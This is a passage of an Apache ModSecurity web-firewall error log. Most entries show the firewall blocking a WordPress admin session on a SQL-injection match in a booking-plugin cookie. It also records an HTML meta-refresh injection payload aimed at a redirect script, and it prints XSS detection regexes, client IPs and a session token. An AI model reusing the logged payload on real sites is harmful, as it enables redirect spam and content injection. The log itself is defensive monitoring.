"agIFF0WKUxpmnkK7zHyseQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:31.931514 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFF0WKUxpmnkK7zHyseQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:32.289510 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFF0WKUxpmnkK7zHyseQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:33.310779 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFGUWKUxpmnkK7zHysewAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:33.311058 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFGUWKUxpmnkK7zHysewAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:33.957630 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFGUWKUxpmnkK7zHysewAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:34.111861 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.120271 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.120785 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-tr..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.120989 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.121386 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://yol.com@asex.y.52.1@leanna.langton@c.or.r.idortpkm@johndf.gfjhfgjf.ghfdjfhjhjhjfdgh@sybbr>r.eces.si.v.e.x.g.z@leanhttps%3a%2F%evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Luxurious evening dress models</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.122084 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.122511 2026] [security2:error] [pid 1416109:tid 1416148] [client 27.78.84.116:58927] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIFGlV4kyjgo4bQBUiBiAAAANI"]
[Mon May 11 18:34:34.356568 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFGkWKUxpmnkK7zHysfQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:34.356880 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFGkWKUxpmnkK7zHysfQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:34.956064 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFGkWKUxpmnkK7zHysfQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:35.305937 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFG0WKUxpmnkK7zHysfwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:35.306246 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFG0WKUxpmnkK7zHysfwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:35.931197 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFG0WKUxpmnkK7zHysfwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:36.441049 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFHEWKUxpmnkK7zHysgAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:36.441487 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFHEWKUxpmnkK7zHysgAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:36.987348 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFHEWKUxpmnkK7zHysgAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:37.158552 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFHUWKUxpmnkK7zHysggAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:37.158841 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFHUWKUxpmnkK7zHysggAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:37.705656 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFHUWKUxpmnkK7zHysggAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:37.843600 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFHUWKUxpmnkK7zHysgwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:37.843935 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFHUWKUxpmnkK7zHysgwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:38.222750 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFHUWKUxpmnkK7zHysgwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:38.495166 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFHkWKUxpmnkK7zHyshAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:38.495459 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFHkWKUxpmnkK7zHyshAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:39.107349 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFHkWKUxpmnkK7zHyshAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:39.368433 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFH0WKUxpmnkK7zHyshgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:34:39.368721 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFH0WKUxpmnkK7zHyshgAAARM"], referer: https://rentparadise.fr/wp-login.php
